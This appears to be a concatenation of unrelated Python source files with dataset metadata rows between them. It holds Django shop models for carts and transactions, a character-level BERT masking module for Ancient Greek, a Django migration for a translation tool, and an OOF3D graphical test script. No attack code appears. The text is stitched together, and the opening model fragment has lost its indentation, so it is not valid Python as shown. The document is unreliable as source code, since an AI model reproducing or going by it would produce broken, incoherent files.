retailProductName = models.CharField(max_length=50, null=True, blank=True)
shopId = models.ForeignKey(Shop, null=True, blank=True)
shopName = models.CharField(null=True, blank=True, default="Shop Name", max_length=60)
username = models.ForeignKey(User, on_delete=models.CASCADE, null=True, blank=True)
name = models.CharField(null=True, blank=True, default="Default Name", max_length=50)
stars = models.IntegerField()
review = models.TextField(max_length=1000)
date = models.CharField(max_length=50, null=True, blank=True)
def __str__(self):
return str(self.retailProductId)
class Cart(models.Model):
id = models.IntegerField(primary_key=True, default=1)
productId = models.ForeignKey(Product, on_delete=models.CASCADE)
productName = models.CharField(max_length=50, default="Product Name", null=True, blank=True)
shopId = models.ForeignKey(Shop, default=None, null=True, blank=True)
shopName = models.CharField(null=True, blank=True, default="Shop Name", max_length=60)
username = models.ForeignKey(User, on_delete=models.CASCADE, null=True, blank=True)
productPrice = models.FloatField(default=0.0, null=True, blank=True)
quantity = models.IntegerField()
status = models.CharField(max_length=10, default="Active")
def __str__(self):
return str(self.productId)
class RetailCart(models.Model):
id = models.IntegerField(primary_key=True, default=1)
retailProductId = models.ForeignKey(RetailProduct, on_delete=models.CASCADE)
retailProductName = models.CharField(max_length=50, default="Retail Product Name", null=True, blank=True)
shopId = models.ForeignKey(Shop, default=None, null=True, blank=True)
shopName = models.CharField(null=True, blank=True, default="Shop Name", max_length=60)
username = models.ForeignKey(User, on_delete=models.CASCADE, null=True, blank=True)
retailProductPrice = models.FloatField(default=0.0, null=True, blank=True)
quantity = models.IntegerField()
status = models.CharField(max_length=10, default="Active")
def __str__(self):
return str(self.retailProductId)
class Transaction(models.Model):
id = models.IntegerField(primary_key=True, default=1)
# productId = models.ForeignKey(Product, on_delete=models.CASCADE)
buyer = models.ForeignKey(User, db_constraint=False, related_name="retailer_name", on_delete=models.CASCADE, null=True, blank=True)
shopId = models.ForeignKey(Shop, null=True, blank=True, db_constraint=False)
shopName = models.CharField(max_length=50, null=True, blank=True)
seller = models.ForeignKey(User, db_constraint=False, related_name="transaction_wholeseller_name", on_delete=models.CASCADE, null=True, blank=True)
# quantity = models.IntegerField()
cartItems = models.ManyToManyField(Cart, db_constraint=False)
total_amount = models.FloatField(default=0.0)
date = models.DateTimeField(default=None, null=True, blank=True)
delId = models.ForeignKey(User, db_constraint=False, on_delete=models.CASCADE, blank=True, null=True)
delStatus = models.CharField(max_length=50, default="Order Placed")
delDate = models.CharField(max_length=50, null=True, blank=True)
name = models.CharField(max_length=100, null=True, blank=True)
phno = models.CharField(max_length=10, null=True, blank=True)
delName = models.CharField(max_length=100, null=True, blank=True)
delPhno = models.CharField(max_length=10, null=True, blank=True)
mode = models.CharField(max_length=10, default="Online")
expectedDate = models.CharField(max_length=50, null=True, blank=True)
deliveryAddress = models.TextField(max_length=500, null=True, blank=True)
def __str__(self):
return str(self.id)
class RetailTransaction(models.Model):
id = models.IntegerField(primary_key=True, default=1)
# retailProductId = models.ForeignKey(RetailProduct, on_delete=models.CASCADE)
buyer = models.ForeignKey(User, db_constraint=False, related_name="consumer_name", on_delete=models.CASCADE, null=True, blank=True)
shopId = models.ForeignKey(Shop, db_constraint=False, null=True, blank=True)
shopName = models.CharField(max_length=50, null=True, blank=True)
seller = models.ForeignKey(User, db_constraint=False, related_name="retail_seller_name", on_delete=models.CASCADE, null=True, blank=True)
retailCartItems = models.ManyToManyField(RetailCart, db_constraint=False)
# quantity = models.IntegerField()
total_amount = models.FloatField(default=0.0)
date = models.DateTimeField(default=None, null=True, blank=True)
delId = models.ForeignKey(User, db_constraint=False, on_delete=models.CASCADE, null=True, blank=True)
delStatus = models.CharField(max_length=50, default="Order Placed", blank=True)
delDate = models.CharField(max_length=50)
name = models.CharField(max_length=100, null=True, blank=True)
phno = models.CharField(max_length=10, null=True, blank=True)
delName = models.CharField(max_length=100, null=True, blank=True)
delPhno = models.CharField(max_length=10, null=True, blank=True)
mode = models.CharField(max_length=10, default="Online")
expectedDate = models.CharField(max_length=50, null=True, blank=True)
deliveryAddress = models.TextField(max_length=500, null=True, blank=True)
def __str__(self):
return str(self.id)
| 50.945545 | 151 | 0.740647 | 1,359 | 10,291 | 5.485651 | 0.087564 | 0.091751 | 0.129041 | 0.168746 | 0.890543 | 0.877398 | 0.853789 | 0.845339 | 0.816767 | 0.805366 | 0 | 0.018245 | 0.137207 | 10,291 | 201 | 152 | 51.199005 | 0.821376 | 0.024876 | 0 | 0.679012 | 0 | 0 | 0.028819 | 0.002792 | 0 | 0 | 0 | 0 | 0 | 1 | 0.074074 | false | 0 | 0.024691 | 0.074074 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
a3da3614f16b05e756d0716cd23220a3164d3b5d | 13,964 | py | Python | char_bert/greek_char_bert/data_handler/input_features.py | brennannicholson/ancient-greek-char-bert | b3180dffa9b6574c3d012e8881d128f80779886e | [
"Apache-2.0"
] | 5 | 2020-02-15T12:42:45.000Z | 2021-11-11T00:24:41.000Z | char_bert/greek_char_bert/data_handler/input_features.py | brennannicholson/ancient-greek-char-bert | b3180dffa9b6574c3d012e8881d128f80779886e | [
"Apache-2.0"
] | 3 | 2020-02-15T12:30:46.000Z | 2021-12-13T20:31:35.000Z | char_bert/greek_char_bert/data_handler/input_features.py | brennannicholson/ancient-greek-char-bert | b3180dffa9b6574c3d012e8881d128f80779886e | [
"Apache-2.0"
] | null | null | null | """Modified utility functions for use with the CharMLM."""
from farm.data_handler.utils import truncate_seq_pair
from greek_char_bert.data_handler.utils import char_mlm_mask_random_words
def remove_unknown_chars(tokens, tokenizer):
"""Replaces unknown characters with a special [UNK] token."""
for i, t in enumerate(tokens):
try:
tokenizer.vocab[t]
except KeyError:
tokens[i] = "[UNK]"
return tokens
# TODO these three samples_to_features variants can probably be combined and a parameter passed to select what functionality is needed
# TODO remove the second seq entirely instead of using a placeholder. We only want to run prediction on individual sequences, not pairs. Alternately, ensure the code doesn't assume a placeholder is used so that the next sequence prediction task can be used with future character based models.
def samples_to_features_bert_char_mlm(sample, max_seq_len, tokenizer):
"""
This method is a copy of samples_to_features_bert_lm from farm/data_handler/input_features.py. It has been modified to use a custom masking algorithm. -BN
Original docs:
Convert a raw sample (pair of sentences as tokenized strings) into a proper training sample with
IDs, LM labels, padding_mask, CLS and SEP tokens etc.
:param sample: Sample, containing sentence input as strings and is_next label
:param max_seq_len: int, maximum length of sequence.
:param tokenizer: Tokenizer
:return: InputFeatures, containing all inputs and labels of one sample as IDs (as used for model training)
"""
tokens_a = sample.tokenized["text_a"]["tokens"]
tokens_b = sample.tokenized["text_b"]["tokens"]
# Modifies `tokens_a` and `tokens_b` in place so that the total
# length is less than the specified length.
# Account for [CLS], [SEP], [SEP] with "- 3"
truncate_seq_pair(tokens_a, tokens_b, max_seq_len - 3)
tokens_a, t1_label = char_mlm_mask_random_words(tokens_a)
# TODO don't make a function call here, tokens_b should always just be '_'
tokens_b, t2_label = char_mlm_mask_random_words(tokens_b)
# convert lm labels to ids
t1_label_ids = [-1 if tok == "" else tokenizer.vocab[tok] for tok in t1_label]
t2_label_ids = [-1 if tok == "" else tokenizer.vocab[tok] for tok in t2_label]
# concatenate lm labels and account for CLS, SEP, SEP
lm_label_ids = [-1] + t1_label_ids + [-1] + t2_label_ids + [-1]
# The convention in BERT is:
# (a) For sequence pairs:
# tokens: [CLS] is this jack ##son ##ville ? [SEP] no it is not . [SEP]
# type_ids: 0 0 0 0 0 0 0 0 1 1 1 1 1 1
# (b) For single sequences:
# tokens: [CLS] the dog is hairy . [SEP]
# type_ids: 0 0 0 0 0 0 0
#
# Where "type_ids" are used to indicate whether this is the first
# sequence or the second sequence. The embedding vectors for `type=0` and
# `type=1` were learned during pre-training and are added to the wordpiece
# embedding vector (and position vector). This is not *strictly* necessary
# since the [SEP] token unambigiously separates the sequences, but it makes
# it easier for the model to learn the concept of sequences.
#
# For classification tasks, the first vector (corresponding to [CLS]) is
# used as as the "sentence vector". Note that this only makes sense because
# the entire model is fine-tuned.
tokens = []
segment_ids = []
tokens.append("[CLS]")
segment_ids.append(0)
for token in tokens_a:
tokens.append(token)
segment_ids.append(0)
tokens.append("[SEP]")
segment_ids.append(0)
assert len(tokens_b) > 0
for token in tokens_b:
tokens.append(token)
segment_ids.append(1)
tokens.append("[SEP]")
segment_ids.append(1)
input_ids = tokenizer.convert_tokens_to_ids(tokens)
# The mask has 1 for real tokens and 0 for padding tokens. Only real
# tokens are attended to.
padding_mask = [1] * len(input_ids)
# Zero-pad up to the sequence length.
while len(input_ids) < max_seq_len:
input_ids.append(0)
padding_mask.append(0)
segment_ids.append(0)
lm_label_ids.append(-1)
# Convert is_next_label: Note that in Bert, is_next_labelid = 0 is used for next_sentence=true!
if sample.clear_text["is_next_label"]:
is_next_label_id = [0]
else:
is_next_label_id = [1]
assert len(input_ids) == max_seq_len
assert len(padding_mask) == max_seq_len
assert len(segment_ids) == max_seq_len
assert len(lm_label_ids) == max_seq_len
feature_dict = {
"input_ids": input_ids,
"padding_mask": padding_mask,
"segment_ids": segment_ids,
"lm_label_ids": lm_label_ids,
"label_ids": is_next_label_id,
}
return [feature_dict]
def premasked_samples_to_features_bert_char_mlm(sample, max_seq_len, tokenizer):
"""
This method is a copy of samples_to_features_bert_lm from farm/data_handler/input_features.py. It has been modified to not mask the samples. -BN
Convert a raw sample (pair of sentences as tokenized strings) into a proper training sample with
IDs, LM labels, padding_mask, CLS and SEP tokens etc.
:param sample: Sample, containing sentence input as strings and is_next label
:param max_seq_len: int, maximum length of sequence.
:param tokenizer: Tokenizer
:return: InputFeatures, containing all inputs and labels of one sample as IDs (as used for model training)
"""
tokens_a = sample.tokenized["text_a"]["tokens"]
tokens_b = sample.tokenized["text_b"]["tokens"]
# Modifies `tokens_a` and `tokens_b` in place so that the total
# length is less than the specified length.
# Account for [CLS], [SEP], [SEP] with "- 3"
truncate_seq_pair(tokens_a, tokens_b, max_seq_len - 3)
# change unknown tokens to the [UNK] token
tokens_a = remove_unknown_chars(tokens_a, tokenizer)
tokens_b = remove_unknown_chars(tokens_b, tokenizer)
# usually t1_label and t2_label would contain the original unmasked tokens, as the tokens are already masked when running prediction, they labels here are simple copies of the original tokens.
t1_label = tokens_a.copy()
t2_label = tokens_b.copy()
# convert lm labels to ids
t1_label_ids = [-1 if tok == "" else tokenizer.vocab[tok] for tok in t1_label]
t2_label_ids = [-1 if tok == "" else tokenizer.vocab[tok] for tok in t2_label]
# concatenate lm labels and account for CLS, SEP, SEP
lm_label_ids = [-1] + t1_label_ids + [-1] + t2_label_ids + [-1]
# The convention in BERT is:
# (a) For sequence pairs:
# tokens: [CLS] is this jack ##son ##ville ? [SEP] no it is not . [SEP]
# type_ids: 0 0 0 0 0 0 0 0 1 1 1 1 1 1
# (b) For single sequences:
# tokens: [CLS] the dog is hairy . [SEP]
# type_ids: 0 0 0 0 0 0 0
#
# Where "type_ids" are used to indicate whether this is the first
# sequence or the second sequence. The embedding vectors for `type=0` and
# `type=1` were learned during pre-training and are added to the wordpiece
# embedding vector (and position vector). This is not *strictly* necessary
# since the [SEP] token unambigiously separates the sequences, but it makes
# it easier for the model to learn the concept of sequences.
#
# For classification tasks, the first vector (corresponding to [CLS]) is
# used as as the "sentence vector". Note that this only makes sense because
# the entire model is fine-tuned.
tokens = []
segment_ids = []
tokens.append("[CLS]")
segment_ids.append(0)
for token in tokens_a:
tokens.append(token)
segment_ids.append(0)
tokens.append("[SEP]")
segment_ids.append(0)
assert len(tokens_b) > 0
for token in tokens_b:
tokens.append(token)
segment_ids.append(1)
tokens.append("[SEP]")
segment_ids.append(1)
input_ids = tokenizer.convert_tokens_to_ids(tokens)
# The mask has 1 for real tokens and 0 for padding tokens. Only real
# tokens are attended to.
padding_mask = [1] * len(input_ids)
# Zero-pad up to the sequence length.
while len(input_ids) < max_seq_len:
input_ids.append(0)
padding_mask.append(0)
segment_ids.append(0)
lm_label_ids.append(-1)
# Convert is_next_label: Note that in Bert, is_next_labelid = 0 is used for next_sentence=true!
if sample.clear_text["is_next_label"]:
is_next_label_id = [0]
else:
is_next_label_id = [1]
assert len(input_ids) == max_seq_len
assert len(padding_mask) == max_seq_len
assert len(segment_ids) == max_seq_len
assert len(lm_label_ids) == max_seq_len
feature_dict = {
"input_ids": input_ids,
"padding_mask": padding_mask,
"segment_ids": segment_ids,
"lm_label_ids": lm_label_ids,
"label_ids": is_next_label_id,
}
return [feature_dict]
def premasked_samples_with_answers_to_features_bert_char_mlm(
sample, max_seq_len, tokenizer
):
"""
This method is a copy of samples_to_features_bert_lm from farm/data_handler/input_features.py. It has been modified to not mask the samples, but simply convert the existing masking. It expects the sample texts to consist of the text then the answers separated by a tab. This is only used when the text has been masked by an external masking algorithm. -BN
Original documentation:
Convert a raw sample (pair of sentences as tokenized strings) into a proper training sample with
IDs, LM labels, padding_mask, CLS and SEP tokens etc.
:param sample: Sample, containing sentence input as strings and is_next label
:param max_seq_len: int, maximum length of sequence.
:param tokenizer: Tokenizer
:return: InputFeatures, containing all inputs and labels of one sample as IDs (as used for model training)
"""
tokens_a = sample.tokenized["text_a"]["tokens"]
tokens_b = sample.tokenized["text_b"]["tokens"]
seq_and_ans = "".join(tokens_a).split("\t")
tokens_a = seq_and_ans[0]
ans = seq_and_ans[1]
# usually t1_label and t2_label would contain the original unmasked tokens, here to have to construct t1 from the answers, t2 is just a copy of the placeholder
t1_label = tokens_a
t2_label = tokens_b.copy()
# construct t1_label
for c in ans:
t1_label = t1_label.replace("#", c, 1)
# here we're effectively retokenizing...
tokens_a = list(tokens_a)
t1_label = list(t1_label)
# Modifies `tokens_a` and `tokens_b` in place so that the total
# length is less than the specified length.
# Account for [CLS], [SEP], [SEP] with "- 3"
truncate_seq_pair(tokens_a, tokens_b, max_seq_len - 3)
# convert masking
conversions = 0
for i, t in enumerate(tokens_a):
if t == "#":
tokens_a[i] = "[MASK]"
conversions += 1
assert conversions == len(ans)
# remove unknown tokens
tokens_a = remove_unknown_chars(tokens_a, tokenizer)
t1_label = remove_unknown_chars(t1_label, tokenizer)
# convert lm labels to ids
t1_label_ids = [-1 if tok == "" else tokenizer.vocab[tok] for tok in t1_label]
t2_label_ids = [-1 if tok == "" else tokenizer.vocab[tok] for tok in t2_label]
# concatenate lm labels and account for CLS, SEP, SEP
lm_label_ids = [-1] + t1_label_ids + [-1] + t2_label_ids + [-1]
# The convention in BERT is:
# (a) For sequence pairs:
# tokens: [CLS] is this jack ##son ##ville ? [SEP] no it is not . [SEP]
# type_ids: 0 0 0 0 0 0 0 0 1 1 1 1 1 1
# (b) For single sequences:
# tokens: [CLS] the dog is hairy . [SEP]
# type_ids: 0 0 0 0 0 0 0
#
# Where "type_ids" are used to indicate whether this is the first
# sequence or the second sequence. The embedding vectors for `type=0` and
# `type=1` were learned during pre-training and are added to the wordpiece
# embedding vector (and position vector). This is not *strictly* necessary
# since the [SEP] token unambigiously separates the sequences, but it makes
# it easier for the model to learn the concept of sequences.
#
# For classification tasks, the first vector (corresponding to [CLS]) is
# used as as the "sentence vector". Note that this only makes sense because
# the entire model is fine-tuned.
tokens = []
segment_ids = []
tokens.append("[CLS]")
segment_ids.append(0)
for token in tokens_a:
tokens.append(token)
segment_ids.append(0)
tokens.append("[SEP]")
segment_ids.append(0)
assert len(tokens_b) > 0
for token in tokens_b:
tokens.append(token)
segment_ids.append(1)
tokens.append("[SEP]")
segment_ids.append(1)
input_ids = tokenizer.convert_tokens_to_ids(tokens)
# The mask has 1 for real tokens and 0 for padding tokens. Only real
# tokens are attended to.
padding_mask = [1] * len(input_ids)
# Zero-pad up to the sequence length.
while len(input_ids) < max_seq_len:
input_ids.append(0)
padding_mask.append(0)
segment_ids.append(0)
lm_label_ids.append(-1)
# Convert is_next_label: Note that in Bert, is_next_labelid = 0 is used for next_sentence=true!
if sample.clear_text["is_next_label"]:
is_next_label_id = [0]
else:
is_next_label_id = [1]
assert len(input_ids) == max_seq_len
assert len(padding_mask) == max_seq_len
assert len(segment_ids) == max_seq_len
assert len(lm_label_ids) == max_seq_len
feature_dict = {
"input_ids": input_ids,
"padding_mask": padding_mask,
"segment_ids": segment_ids,
"lm_label_ids": lm_label_ids,
"label_ids": is_next_label_id,
}
return [feature_dict]
| 39.224719 | 359 | 0.676812 | 2,145 | 13,964 | 4.215385 | 0.122611 | 0.008626 | 0.010949 | 0.011944 | 0.832891 | 0.826476 | 0.82161 | 0.814311 | 0.805242 | 0.805242 | 0 | 0.0169 | 0.237253 | 13,964 | 355 | 360 | 39.335211 | 0.832035 | 0.503223 | 0 | 0.786982 | 0 | 0 | 0.049261 | 0 | 0 | 0 | 0 | 0.005634 | 0.094675 | 1 | 0.023669 | false | 0 | 0.011834 | 0 | 0.059172 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
430041d08aaf368081a18a956496f877409612f3 | 6,971 | py | Python | translations_tool/translations/migrations/0001_initial.py | dzieje-khorinis/Translations-Tool | 67f9e987234cfddee0bfb937a6c873df86e068d0 | [
"MIT"
] | null | null | null | translations_tool/translations/migrations/0001_initial.py | dzieje-khorinis/Translations-Tool | 67f9e987234cfddee0bfb937a6c873df86e068d0 | [
"MIT"
] | 3 | 2021-09-02T13:59:18.000Z | 2022-02-28T17:08:18.000Z | translations_tool/translations/migrations/0001_initial.py | dzieje-khorinis/Translations-Tool | 67f9e987234cfddee0bfb937a6c873df86e068d0 | [
"MIT"
] | null | null | null | # Generated by Django 3.1.5 on 2021-01-17 19:45
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import simple_history.models
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='TranslationGroup',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name_en', models.CharField(blank=True, max_length=255)),
('name_pl', models.CharField(blank=True, max_length=255)),
('name_de', models.CharField(blank=True, max_length=255)),
('name_ru', models.CharField(blank=True, max_length=255)),
('order_index', models.IntegerField(default=0)),
('parent', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='translations.translationgroup')),
],
),
migrations.CreateModel(
name='Translation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('key', models.TextField(db_index=True, max_length=2000)),
('value_en', models.TextField(blank=True, max_length=2000)),
('value_pl', models.TextField(blank=True, max_length=2000)),
('value_de', models.TextField(blank=True, max_length=2000)),
('value_ru', models.TextField(blank=True, max_length=2000)),
('state_en', models.CharField(choices=[('NEW', 'New'), ('TODO', 'To do'), ('READY_TO_REVIEW', 'Ready to review'), ('NEEDS_WORK', 'Needs work'), ('ACCEPTED', 'Accepted')], default='NEW', max_length=255)),
('state_pl', models.CharField(choices=[('NEW', 'New'), ('TODO', 'To do'), ('READY_TO_REVIEW', 'Ready to review'), ('NEEDS_WORK', 'Needs work'), ('ACCEPTED', 'Accepted')], default='NEW', max_length=255)),
('state_de', models.CharField(choices=[('NEW', 'New'), ('TODO', 'To do'), ('READY_TO_REVIEW', 'Ready to review'), ('NEEDS_WORK', 'Needs work'), ('ACCEPTED', 'Accepted')], default='NEW', max_length=255)),
('state_ru', models.CharField(choices=[('NEW', 'New'), ('TODO', 'To do'), ('READY_TO_REVIEW', 'Ready to review'), ('NEEDS_WORK', 'Needs work'), ('ACCEPTED', 'Accepted')], default='NEW', max_length=255)),
('order_index', models.IntegerField(default=0)),
('parent', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='translations.translationgroup')),
],
),
migrations.CreateModel(
name='HistoricalTranslationGroup',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('name_en', models.CharField(blank=True, max_length=255)),
('name_pl', models.CharField(blank=True, max_length=255)),
('name_de', models.CharField(blank=True, max_length=255)),
('name_ru', models.CharField(blank=True, max_length=255)),
('order_index', models.IntegerField(default=0)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('parent', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='translations.translationgroup')),
],
options={
'verbose_name': 'historical translation group',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='HistoricalTranslation',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('key', models.TextField(db_index=True, max_length=2000)),
('value_en', models.TextField(blank=True, max_length=2000)),
('value_pl', models.TextField(blank=True, max_length=2000)),
('value_de', models.TextField(blank=True, max_length=2000)),
('value_ru', models.TextField(blank=True, max_length=2000)),
('state_en', models.CharField(choices=[('NEW', 'New'), ('TODO', 'To do'), ('READY_TO_REVIEW', 'Ready to review'), ('NEEDS_WORK', 'Needs work'), ('ACCEPTED', 'Accepted')], default='NEW', max_length=255)),
('state_pl', models.CharField(choices=[('NEW', 'New'), ('TODO', 'To do'), ('READY_TO_REVIEW', 'Ready to review'), ('NEEDS_WORK', 'Needs work'), ('ACCEPTED', 'Accepted')], default='NEW', max_length=255)),
('state_de', models.CharField(choices=[('NEW', 'New'), ('TODO', 'To do'), ('READY_TO_REVIEW', 'Ready to review'), ('NEEDS_WORK', 'Needs work'), ('ACCEPTED', 'Accepted')], default='NEW', max_length=255)),
('state_ru', models.CharField(choices=[('NEW', 'New'), ('TODO', 'To do'), ('READY_TO_REVIEW', 'Ready to review'), ('NEEDS_WORK', 'Needs work'), ('ACCEPTED', 'Accepted')], default='NEW', max_length=255)),
('order_index', models.IntegerField(default=0)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('parent', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='translations.translationgroup')),
],
options={
'verbose_name': 'historical translation',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
]
| 70.414141 | 219 | 0.601635 | 762 | 6,971 | 5.307087 | 0.133858 | 0.066766 | 0.057864 | 0.071217 | 0.902572 | 0.902572 | 0.902572 | 0.902572 | 0.902572 | 0.902572 | 0 | 0.021183 | 0.221202 | 6,971 | 98 | 220 | 71.132653 | 0.723706 | 0.006455 | 0 | 0.791209 | 1 | 0 | 0.218082 | 0.029607 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.043956 | 0 | 0.087912 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
43006f02a2e1ee32bfdba08206214be3411745c5 | 29,221 | py | Python | TEST3D/GUI/0010003_page_micro/log.py | usnistgov/OOF3D | 4fd423a48aea9c5dc207520f02de53ae184be74c | [
"X11"
] | 31 | 2015-04-01T15:59:36.000Z | 2022-03-18T20:21:47.000Z | TEST3D/GUI/0010003_page_micro/log.py | usnistgov/OOF3D | 4fd423a48aea9c5dc207520f02de53ae184be74c | [
"X11"
] | 3 | 2015-02-06T19:30:24.000Z | 2017-05-25T14:14:31.000Z | TEST3D/GUI/0010003_page_micro/log.py | usnistgov/OOF3D | 4fd423a48aea9c5dc207520f02de53ae184be74c | [
"X11"
] | 7 | 2015-01-23T15:19:22.000Z | 2021-06-09T09:03:59.000Z | # -*- python -*-
# This software was produced by NIST, an agency of the U.S. government,
# and by statute is not subject to copyright in the United States.
# Recipients of this software assume all responsibilities associated
# with its operation, modification and maintenance. However, to
# facilitate maintenance we ask that before distributing modified
# versions of this software, you first contact the authors at
# oof_manager@nist.gov.
# We test how voxels selection groups are handled in a microstructure.
# Meaning what is the difference between Remove and Clear but also how can we provide some selections:
# graphicaly or by the Voxel Selection Page using a specific mehtod.
# This test is mainly directed to the way that the selections are handle through the voxels group.
import tests
findWidget('OOF3D').resize(550, 350)
setComboBox(findWidget('OOF3D:Navigation:PageMenu'), 'Microstructure')
checkpoint page installed Microstructure
findWidget('OOF3D:Microstructure Page:Pane').set_position(225)
# create a microstructure with loaded files
findWidget('OOF3D:Microstructure Page:NewFromFile').clicked()
checkpoint toplevel widget mapped Dialog-Load Image and create Microstructure
checkpoint meshable button set
findWidget('Dialog-Load Image and create Microstructure').resize(401, 215)
checkpoint microstructure page sensitized
findWidget('Dialog-Load Image and create Microstructure:filenames:Entire Directory:directory').set_text('.')
findWidget('Dialog-Load Image and create Microstructure:filenames:Entire Directory:directory').set_text('TEST_DATA/5color')
findWidget('Dialog-Load Image and create Microstructure:microstructure_name:Auto').clicked()
checkpoint meshable button set
findWidget('Dialog-Load Image and create Microstructure:microstructure_name:Text').set_text('m')
findWidget('Dialog-Load Image and create Microstructure:microstructure_name:Text').set_text('mi')
checkpoint microstructure page sensitized
findWidget('Dialog-Load Image and create Microstructure:microstructure_name:Text').set_text('mic')
findWidget('Dialog-Load Image and create Microstructure:microstructure_name:Text').set_text('micr')
findWidget('Dialog-Load Image and create Microstructure:microstructure_name:Text').set_text('micro')
findWidget('Dialog-Load Image and create Microstructure:gtk-ok').clicked()
findWidget('OOF3D Messages 1').resize(603, 200)
findWidget('OOF3D:Microstructure Page:Pane').set_position(159)
checkpoint meshable button set
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint pixel page updated
checkpoint active area status updated
checkpoint microstructure page sensitized
checkpoint Field page sensitized
checkpoint meshable button set
checkpoint Materials page updated
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page sensitized
checkpoint pinnodes page sensitized
checkpoint boundary page updated
checkpoint skeleton selection page updated
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page groups sensitized
checkpoint Solver page sensitized
checkpoint microstructure page sensitized
checkpoint OOF.Microstructure.Create_From_ImageFile
# check that the new group button is sensitized
assert tests.sensitization1()
# open a graphics window
findMenu(findWidget('OOF3D:MenuBar'), 'Windows:Graphics:New').activate()
checkpoint Move Node toolbox info updated
checkpoint toplevel widget mapped OOF3D Graphics 1
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 705))
checkpoint OOF.Windows.Graphics.New
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 705))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
findWidget('OOF3D Graphics 1').resize(1000, 800)
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 705))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 705))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
# do some voxels selection
setComboBox(findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame:TBChooser'), 'Voxel Selection')
findWidget('OOF3D Graphics 1:Pane0:Pane2:ToolboxFrame').size_allocate(gtk.gdk.Rectangle(0, 29, 380, 705))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
findWidget('OOF3D Graphics 1:Pane0:Pane2:tumble').clicked()
findWidget('OOF3D Graphics 1:Pane0:Pane2').size_allocate(gtk.gdk.Rectangle(0, 29, 1000, 705))
window = findOOFWindow('Graphics_1')
oldsize = window.setCanvasSize(614, 671)
canvasobj = findCanvasDrawingArea(findWidget('OOF3D Graphics 1:Pane0:Pane2:Canvas'), windowname='Graphics_1')
